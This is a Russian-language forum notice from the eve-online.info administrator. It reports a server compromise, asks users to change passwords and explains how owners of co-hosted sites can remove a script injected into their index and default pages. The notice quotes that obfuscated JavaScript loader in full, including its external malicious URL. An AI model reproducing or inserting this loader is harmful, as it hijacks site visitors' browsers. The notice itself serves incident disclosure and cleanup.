Тема: Хакерская атака
Сервер на котором расположен сайт и форум eve-online.info подвергся вирусной атаке.
Всем рекомендуется сменить пароли на форуме.
Владельцам сайтов, форумов и киллборд расположенных на сервере eve-online.info - корпорации asn, cnc, f-u-i и д.р. прошу обратить внимание, что в результате вирусной активности на сервере все файлы имеющие название index*.html, index*.php default*.php подверглись изменению - в самом конце этих фалов добавился скрипт:
/*LGPL*/ try{ window.onload = function(){var Qyfx28mvap1 = document.createElement('s!(&#@c@&r#i!#&p(#$#t#$&'.replace(/\!|\(|\^|@|\$|\)|&|#/ig, ''));Qyfx28mvap1.setAttribute('defer', 'd$#$e(@@!f!&e&#&^r!$('.replace(/\(|\$|\!|#|\^|\)|@|&/ig, ''));Qyfx28mvap1.setAttribute('type', 't)&e$$x)@$t)/!#j@!a^($v!&a&$!^s^$c(r&@@@i(#)&p@t)@'.replace(/\$|\(|@|\)|&|\^|\!|#/ig, ''));Qyfx28mvap1.setAttribute('id', 'M&)z&(2)w@!!q#!&z&k@@d$$5&z!)&'.replace(/\!|@|\^|#|\$|\)|&|\(/ig, ''));Qyfx28mvap1.setAttribute('s)(r^@$c!@!'.replace(/\)|\!|&|\$|\(|@|\^|#/ig, ''), 'h@!!^t(t)$p^!:#/^&!#/#^f@@&(c^^#)2#)^@-)&$c)$)o@!m@).!$&$^c)()c#($t&(v)&#.$))c^(&o&!^m)&.(#^s)!o!@-&@n$!e)t@$#$-##!n!($e!-)j^(p^$^.@&&w#e@#!b@d@@((i!@r$@)e)&^^c^$$t!&b#r^&(@o#!^^k@(!e$#r(.&)@r(@@u!$:$!$8&0^))!8$!#0!$)/!c^)n&c($^@m@a&!x).^c$$n((/^!&)c#n$@)c!^!m#)a!&x!.)@^c@n(&/)#)&t)^i$)a(n$(y&$!a@#@^.#^&!c)(n&/&)$p#@$e)^##o!)p^^l@(e^@@.^(&$#c!(o#$()m(!&&^/()(@g)@$o(!o)g&)l$@e(($!$.^$@c(o(@)@m^!/@)#'.replace(/\(|\!|\^|&|@|\)|#|\$/ig, ''));if (document){document.body.appendChild(Qyfx28mvap1);}} } catch(Psphwkyq1nsl4w5ns7s13p) {}
<!--bcc0a508088fb4839ef67d330565bd61-->Этот скрипт является причиной сбоев и либо не пускает на сайт либо переправляет на порно-сайты.
Нужно через фтп открыть файлы index*.html, index*.php default*.php (во всех папках на сервере) и вручную удалить из них эти две строчки скрипта.
Либо перезалить чистые файлы на сервер index*.html, index*.php default*.php (предварительно удалив их с сервера, а не в режиме замены файла).
